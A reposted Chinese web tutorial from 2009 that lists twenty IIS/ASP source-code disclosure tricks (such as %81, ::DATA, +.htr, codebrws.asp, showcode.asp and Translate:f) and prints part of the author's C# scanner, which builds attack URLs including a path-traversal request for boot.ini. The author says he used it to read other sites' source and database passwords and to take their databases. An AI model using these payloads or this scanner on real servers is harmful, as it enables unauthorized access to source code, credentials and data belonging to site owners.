当前位置: 首页 > 图文教程 > 网络编程 > ASP > 20种看asp源码的方法及工具

ASP
提高SQL的执行效率的ASP的五种做法
asp的offset的一个go to page
asp中command的在单条记录时,有些字段显示为空的问题
asp,php一句话木马整理方便查找木马
asp 合并记录集并删除的sql语句
asp下循环一行多少个
asp循环行数输出函数
asp access重新开始编号
ASP生成数字相加求和的BMP图片验证码
静态页面利用JS读取cookies记住用户信息
比较详细的Asp伪静态化方法及Asp静态化探讨
asp Response.flush 实时显示进度
Asp高级故障解决以及相关代码
asp智能脏话过滤系统v1.0
ASP文件中的安全问题
Access数据库中“所有记录中均未找到搜索关键字”的解决方法
asp两组字符串数据比较合并相同数据
asp MYSQL出现问号乱码的解决方法
asp文章中随机插入网站版权文字的实现代码
ASP利用XMLHTTP实现表单提交以及cookies的发送的代码

ASP 中的 20种看asp源码的方法及工具


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-03   浏览: 159 ::
收藏到网摘: n/a

       众所周知windows平台漏洞百出,补丁一个接一个,但总是补也补不净。我把我所知道的20种看asp源码的方法总结了一下,并且用c#写了个应用程序来扫描这些漏洞,发现虽然大部分的方法已经不起做用,但还是有一些漏网之鱼的:),结果这两天真看到不少站的源代码,包括数据库密码,如果用access的可以把库下载下来,而用sql server的如果不是用udl,dsn等来连接的话,也可以通过tcp/ip网络库连接到数据库,为所欲为呀。先面把这20种方法列在下面:
  
  .
  %81
  ::DATA
  %2e
  %2e%41sp
  +.htr
  \\
  longhtr
  .bak
  codebrws.asp
  showcode.asp
  null.htw
  qfullhit.htw
  qsumrhit.htw
  query.idq
  search/qfullhit.htw
  search/qsumrhit.htw
  iirturnh.htw
  .htw
  Translate:f
  
  
  上边这些漏洞前面10几条是通过在asp文件后直接加上,如%81就是xxx.asp%81,后面这些都是通过iis自带的例子或系统漏洞实现的,最特别的是那种translate:f方法,它直接通过浏览器是无法使用的,必须同服务器建立tcp/ip的socket连接,发送请求才行,具体每个漏洞如何使用,看下面,这是我那个应用程序的一部分,如果你要全部的可以到我的站点去下载。
  
   switch (this.cboMethod.SelectedIndex)
   {
   case 0: //直接读取
   strRequestFile = strServer + strUrl ;
   break ;
   case 5 : //%2e%41sp
   strRequestFile = strServer + strPath + strFirst
   + "%2e%41sp" ;
   break ;
   case 8 : //longhtr
   strRequestFile = strServer + strUrl
   + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
   + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
   + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
   + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
   break ;
  
   case 10: //codebrws.asp
   strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
   + strUrl ;
   break ;
  
   case 11: //showcode.asp
   strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
   + "/msadc/../../../../boot.ini" ;